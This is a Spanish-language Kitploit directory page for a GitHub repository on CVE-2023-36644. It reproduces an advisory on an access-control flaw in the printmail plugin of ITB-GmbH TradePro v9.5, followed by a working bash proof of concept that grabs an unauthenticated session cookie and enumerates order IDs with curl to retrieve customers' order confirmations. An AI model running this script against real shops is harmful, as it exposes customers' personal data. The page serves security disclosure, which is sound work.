Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-36644 | Kitploit
Herramientas/GitHubGitHub/caffeinated-labs/cve-2023-36644
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

== Software afectado [%hardbreaks] Proveedor: ITB-GmbH Productos afectados: TradePro (v9.5) Componente: Printmail Plugin Confirmado: sí

== Vector de ataque [%hardbreaks] Tipo: Control de acceso incorrecto Tipo de acceso: Remoto Impacto: Divulgación de información

El control de acceso incorrecto en el plugin printmail de ITB-GmbH TradePro v9.5 permite a atacantes remotos recibir todas las confirmaciones de pedido de la tienda en línea pasando números de pedido arbitrarios a un endpoint http(s).

== Descripción El orderid debería conocerse de antemano, pero puede enumerarse fácilmente o mediante un SQLi (ver Informe link:/security/CVE-2023-36645[CVE-2023-36645])

Llamar a http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] con una cookie de sesión válida pero no autenticada da al atacante acceso a todas las confirmaciones de pedido.

== CVSS [%hardbreaks] Puntuación: 7.1 Vector: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== PoC [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== Créditos

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
Descargar herramienta